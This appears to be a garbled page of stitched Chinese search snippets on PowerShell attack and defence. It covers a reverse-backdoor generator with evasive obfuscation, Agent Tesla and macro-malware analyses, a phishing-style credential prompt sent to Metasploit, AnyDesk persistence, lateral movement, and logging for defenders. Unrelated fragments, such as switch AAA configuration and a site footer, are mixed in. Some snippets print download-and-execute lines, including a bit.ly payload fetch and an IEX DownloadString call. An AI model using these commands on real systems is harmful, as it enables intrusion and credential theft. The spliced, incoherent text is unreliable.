关于PBG PBG的全称为Powershell Backdoor Generator,是一款功能强大的PowerShell后门生成工具,该工具能够生成PowerShell反向后门,并使用Python...来对代码进行混淆处理,而且每一次构建后都会提供新的签名以实现检测绕过。...功能介绍 1、Hak5 USB Rubber Ducky Payload生成; 2、Flipper Zero Payload生成; 3、从远程系统下载文件; 4、从URL播放wav文件; 5、获取目标计算机的公共...接下来,广大研究人员可以使用下列命令将该项目源码克隆至本地: git clone https://github.com/Drew-Alleman/powershell-backdoor-generator.git...(向右滑动,查看更多) 工具帮助信息 usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out
用 Powershell 编写并用 Python 混淆的反向后门。允许后门在每次运行后都有一个新的签名。...usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay...Backdoor Generator options: -h, --help show this help message and exit --ip-address...Just listen for any backdoor connections and host the backdoor directory Flipper Zero有效载荷 从远程系统下载文件...32b9ca5c3cd088323da7aed161a788709d171b71 [*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop USB/USB Rubber Ducky 攻击 当使用这些攻击中的任何一种时
计费不是必须使用的。...配置AAA AAA认证方案:配置本地认证或远程认证方案 远程认证需要配置RADIUS方案或TACACS+方案 AAA实现方法:在ISP域中引用已经配置的AAA方案 AAA的配置可以分为两部分: 第1步...:根据需要配置本地认证或远程认证方案,远程认证时需要配置RADIUS方案或TACACS+方案: 本地认证:需要在交换机上配置本地用户名,并设置相应的密码和用户级别。...主、从认证授权(计费)服务器;也可以一台服务器即作为主认证授权(计费)服务器,又作为从服务器。...,难以分离 协议报文较复杂,认证和授权分离在不同的安全服务器上实现 不支持对设备的配置命令进行授权使用,用户登录设备后可以使用的命令由用户级别决定 支持对设备的配置命令进行授权使用,用户可以使用的命令行受到用户级别和
执行 LNK 文件后,嵌入的 PowerShell 代码会生成 MSHTA 来执行远程服务器上的 HTA 文件。...解密后的 PowerShell 脚本是一个 Downloader,通过远程服务器下载 Agent Tesla,再使用 CMSTP 绕过 UAC 以管理权限执行。...技术分析 鱼叉邮件的主题为订单确认,如下所示: 【鱼叉邮件】 邮件带一个GZIP文件作附件,与带PDF图标的恶意LNK文件捆绑在。...【执行新的 PowerShell 代码】 IEX 函数执行 AES 解密与 GZIP 解压是关键的 PowerShell 代码: 从远程服务器下载 Agent Tesla 的 Payload 执行...【恶意 INF 文件】 将 INF 文件写入临时目录后,PowerShell 代码会生成一个新进程 cmstp.exe,并以 /au $InfFileLocation作为参数,然后安装恶意 INF 文件
**欢迎关注我的微信公众号《壳中之魂》** Anydesk是类似teamviewer的远程管理软件,但是他不用安装且体积小 使用场景 有云锁,护卫神等禁止3389登录时 类似阿里云这种,登录3389...,此时,除非能用winlogon启动anydesk,否则没法使用屏幕 攻击 Windows 假使我们在windows上拿到目标的shell,为了方便模拟就上线了一个cs的shell ?...使用一些提权的powershell脚本,脚本弹出了一个新的cmd窗口,但是数据不通过cs,只能通过远程桌面操作,但是不能直接RDP 然后我们可以通过命令让目标下载anydesk powershell (...但是不着急执行,原因是我们不知道目标的凭证,自然无法连接 打开自己本机的anydesk,会弹出一个窗口 ? 可以发现,anydesk连接的方式并非是局域网,而是通过互联网,一断网就无法使用 ?...,如果要使用计划任务,首先要知道当前用户是谁 powershell "(((Get-WmiObject -Class Win32_Process -Filter 'Name=\"explorer.exe
Win32LockWorkStation" -namespace Win32Functions -passthru $LockWorkStation::LockWorkStation() | Out-Null } 2.测试 原本以为凡是远程执...⾏命令就可以达到⽬标,但是经过测试后才发现现实很⻣感,测试了计划任务、wmic、winrm、psexec、MSF Meterpreter、Cobalt Strike beacon五种远程执⾏⽅法,仅有MSF...如果要求交互式任务,则使用 schtasks.exe 实用程序(使用 "schtasks /?" 命令获取详细信 息)。 2.2MSF 1....直接利⽤meterpreter的shell功能,获取⼀个⽬标的交互式窗⼝,执⾏ rundll32.exe user32.dll,LockWorkStation 即可锁定当前⽤⼾。 2....帮助说“可以使⽤指定的PID作为⽗进程”,在当前⽤⼾的PID可以正常执⾏命令,但是使⽤其他⽤⼾的就会出现问题:⽬标⽤⼾PID虽然会创建⼦进程,但是提⽰“Path: [Error opening process
执行程序 PsExec来自微软的 Sysinternals套件,允许用户使用命名管道通过端口 445 (SMB) 在远程主机上执行 PowerShell。...两者之间的区别,尽管 CS 文档说,PsExec (psh) 正在调用 Powershell.exe,并且您的信标将作为 Powershell.exe 进程运行,而没有 (psh) 的 PsExec 将作为...因此,如果为此使用非服务二进制文件,它将作为代理/信标返回一秒钟,然后死亡。...通过在端口 135 上使用远程过程调用 (RPC) 进行远程访问(以及稍后的临时端口)进行通信,它允许系统管理员远程执行自动化管理任务,例如远程启动服务或执行命令。...,即使 WinRM 服务已启动,也必须存在侦听器才能处理请求。
渗透测试人员和红队通过通过执行powershell.exe在远程主机上面运行经过base64编码的命令来完成横向移动,然后返回到目标的会话。...PsExec PsExec来自Microsoft的Sysinternals套件,允许用户使用命名管道通过端口445(SMB)在远程主机上执行Powershell。...两者之间的区别,尽管CS文档有说明,PsExec(psh)仍在调用Powershell.exe,并且您的信标将作为Powershell.exe进程运行,而没有(psh)的PsExec将作为rundll32...因此,如果为此使用非服务二进制文件,则它将作为agent/beacon 再次出现,然后die。...,即使启动了WinRM服务,也必须存在一个侦听器,以便其处理请求。
,然后远程服务器将收到的结果保存在文本文件中,可以将 Powershell 的命令放在 bat 文件中执行,下载地址: https://github.com/Dviros/CredsLeaker ?...脚本也可以通过远程调用: powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('http://10.0.0.13...set URIPATH / 使用下面的 powershell 代码创建输入提示符窗口,并将凭据通过 HTTP 请求发送至远程 Metasploit 服务器,从而获取凭证: 为了方便操作,需要将以上代码转为...使用下面的命令将 base64 的 payload 执行: powershell.exe -ep bypass -enc ? Metasploit 获得的结果如下: ?...输入提示框作为该进程需要认证作为提示展示给用户,要求输入凭证,如果设置的进程不合理,很容易被人发现异常: ? 当用户输入凭据时,捕获到凭证将显示在控制台: ?
背景资料 偶然发现在我的测试中使用PowerShell远程处理作为维护系统远程代码执行的主要方法很有用。它是一个内置的Windows功能。...PowerShell远程处理需要对Kerberos身份验证,这意味着客户端计算机和目标计算机必须都连接到同一域。如果我们没有可以连接的机器来执行远程处理,那么这对测试人员来说可能会造成问题。...如何使用从Linux到Windows的PowerShell远程处理 本节将逐步介绍如何从Linux客户端到Windows目标建立远程PowerShell会话。...这是在Enter-PSSession设置阶段使用NTLM身份验证所必需的,这是唯一可用于通过PowerShell远程连接从Linux连接到Windows的身份验证机制。.../powershell-ntlm 6.现在我们一直在等待:使用以下命令进入远程PowerShell会话 - 请注意,您必须指定-Authentication类型: # Grab the creds we
尽管如此,旧版本中的默认日志记录级别也可以提供足够的证据来识别PowerShell使用情况,将远程处理与本地活动区分开来并提供诸如会话持续时间和相关用户帐户之类的上下文,这些已经可以帮助位于防御方的蓝队人员进行相关的攻击事件推断和关联性分析...如果正在使用PowerShell远程处理,则访问的系统将使用HostName = ServerRemoteHost记录这些事件。 两条消息都不记录与PowerShell活动关联的用户帐户。...Microsoft-Windows-WinRM/Operational.evtx WinRM操作日志记录Windows远程管理服务的所有使用,包括通过PowerShell远程处理进行的操作。...处于活动状态时,涉及远程命令执行安全相关的事件ID如下: • 事件ID 32850:记录为远程处理进行身份验证的用户帐户; • 事件ID 32867/32868:记录在PowerShell远程处理期间进行的每个...等操作系统上的支持在MacOS上安装(pwsh),处于安全性考虑日志记录作为必不可少的一部分,PowerShell使用本机os_log API登录Apple的统一日志记录系统。
项目漏洞处理分析【搜索引擎】当我们拿到一些已知BUG,最简单快捷的方式就是通过搜索引擎来获取答案,然后使用正确的方式来处理,验证无误后,上报处理结果。...漏洞版本:2.2.0 ~ 2.4.0项目引入版本:2.2.0 com.xuxueli xxl-job-core...从代码支撑的语言可以看出来,支持Java、Shell、Python、NodeJS、PHP、PowerShell……等(动态生效:用户在线通过Web IDE开发的任务代码,远程推送至执行器,实时加载执行)...("GLUE(PowerShell)", true, "powershell", ".ps1");处理方式知道漏洞出现的原因以及出现的位置,那么处理起来就比较顺心应手,直接找到application.yaml...使用上述默认的处理方式不生效,大家可以进入代码调试。
恶意宏代码,会启动PowerShell进程,从远程服务器上下载恶意程序,然后执行,相关参数,如下: powershell (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE...( ”http://bit.ly/2P7EoT7 ” , ”$ENv:teMp\4235.exe” ) ; stARt ”$ENv:tEMP\4235.exe” 分析下载的恶意程序,使用NET语言进行开发...,首先会获取远程服务器地址:hxxps://paste.ee/r/RrkBF,如下所示: ?...读取远程服务器上的内容,如下所示: ? 直接加载执行远程服务器上的脚本,如下所示: ? 解密去混淆远程服务器上的脚本之后,同样是一个NET编写的程序,如下所示: ?...*本文作者:深信服千里目安全实验室,转载请注明来自FreeBuf.COM
C:\Windows\SysWOW64\WindowsPowerShell\v1.0 传统的CMD支持脚本编写,但扩展性不好,而Powershell类似于Linux shell,具有更好的远程处理、工作流...(4) 管道 PowerShell的管道作用是将一个命令的输出作为另一个命令的输入,两个命令之间用管道符号(|)连接。...下面以文件操作为例讲解PowerShell命令的基本用法。...(1) 下载远程PowerShell脚本绕过权限执行 调用DownloadString函数下载远程的ps1脚本文件。...进程中,或反射地将DLL注入远程进程 Invoke-Shellcode.ps1 将shellcode插入您选择的进程ID或本地PowerShell中 Invoke-WmiCommand.ps1 在目标主机使用
前文分享了Windows基础,包括系统目录、服务、端口、注册表黑客常用的DOS命令及批处理powershell。...C:\Windows\SysWOW64\WindowsPowerShell\v1.0 传统的CMD支持脚本编写,但扩展性不好,而Powershell类似于Linux shell,具有更好的远程处理、工作流...(4) 管道 PowerShell的管道作用是将一个命令的输出作为另一个命令的输入,两个命令之间用管道符号(|)连接。...下面以文件操作为例讲解PowerShell命令的基本用法。...(1) 下载远程PowerShell脚本绕过权限执行 调用DownloadString函数下载远程的ps1脚本文件。
尽管如此,旧版本中的默认日志记录级别也可以提供足够的证据来识别PowerShell使用情况,将远程处理与本地活动区分开来并提供诸如会话持续时间和相关用户帐户之类的上下文,这些已经可以帮助位于防御方的蓝队人员进行相关的攻击事件推断和关联性分析...如果正在使用PowerShell远程处理,则访问的系统将使用HostName = ServerRemoteHost记录这些事件。 两条消息都不记录与PowerShell活动关联的用户帐户。...但是,通过使用这些事件,分析人员可以确定PowerShell会话的持续时间,以及它是在本地运行还是通过远程运行。 ?...从攻防发展的历史来看,此版本出现后攻击者也考虑了其他方式来躲避日志记录,比如使用大量的混淆算法来进行模糊处理。...防御角度(蓝队视角): 由于PowerShell支持在Linux和MacOS等操作系统上安装(pwsh),处于安全性考虑日志记录作为必不可少的一部分,PowerShell使用本机os_log API登录
设置macOS系统远程连到windows系统的powershell 本地还是更喜欢iTerm2的终端,windows里带的powershell终端实在是用不惯,于是设置了下通过ssh连接到windows...详细参见这里 别名 cmdlet 的名称由一个动词和一个名词组成,其功能对用户来讲一目了然。...PSRemotingProtocolVersion:Windows PowerShell 远程管理协议的版本 $Pwd 包含一个路径对象,该对象表示当前目录的完整路径。...会把文本按每一行作为元素存为数组。...其中: Format的管道处理用法参见这里 排序和分组的管道处理用法参见这里 Select-Object、Where-Object、ForEach-Object用法参见这里 导出的管道处理用法参见这里
通常,PowerShell 是一种很好的管理方法,因为通过 PowerShell 远程处理(通过 Enter-PSSession 或 Invoke-Command)连接到远程系统是一种网络登录——没有凭据存储在远程系统的内存中...有一种方法可以通过 PowerShell 远程处理连接到远程系统,并且能够通过 CredSSP 使用凭证。问题是 CredSSP 不安全。...Joe Bialek 在 PowerShellMagazine.com 上写了这篇文章: 管理员在使用 PowerShell 远程处理时面临的一个常见问题是“双跳”问题。...原因是,默认情况下,PowerShell 远程处理使用“网络登录”进行身份验证。网络登录通过向远程服务器证明您拥有用户凭证而不将凭证发送到该服务器来工作(请参阅Kerberos和NTLM身份验证)。...所以,请不要使用 CredSSP。 类似的问题是WinRM(PowerShell 远程处理使用)中称为“AllowUnencrypted”的配置设置。
PowerShell模块日志可以配置为记录所有的PowerShell模块的活动情况,包括单一的PowerShell命令、导入的模块、远程管理等。可以通过GPO进行启用模块日志记录。...由于PowerShell在Linux和MacOS等操作系统上的支持在MacOS上安装(pwsh),处于安全性考虑日志记录作为必不可少的一部分,PowerShell使用本机os_log API登录Apple...在Linux上,PowerShell使用Syslog,微软将此上升成为一种几乎全平台支持的日志记录解决方案。...作为PowerShell 7的一部分,Microsoft在之前的日志记录基础上,增加了一种安全使用本地或远程存储中的凭据的方法,以便不需要将密码嵌入到脚本中。...600 500 始终记录,无论记录设置如何 记录类似“WSMan”等提供程序在系统上进行PowerShell处理活动的开始,比如”Provider WSMan Is Started“; 800 500
描述: 该cmdlet将计算机配置为接收通过使用WS-Management技术发送的PowerShell远程命令。...当前仅在Windows平台上支持基于WS-Management的PowerShell远程处理(此cmdlet在Linux或MacOS版本的PowerShell中不可用)。...Tips : Windows Server 平台上默认启用PowerShell远程处理, 通常不允许在计算机位于公用网络上时在Windows客户端版本上启用PowerShell远程处理,但是您可以使用SkipNetworkProfileCheck...-Force # 在计算机位于公用网络上时在Windows客户端版本上启用PowerShell远程处理 # 在此计算机上设置了 WinRM 以接收请求。...AsJob 参数 : 将命令作为后台作业运行。 Wait 参数 : 等待重启完成。 For 参数 : 指定PowerShell可以在远程计算机上运行命令。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
对象存储
云直播
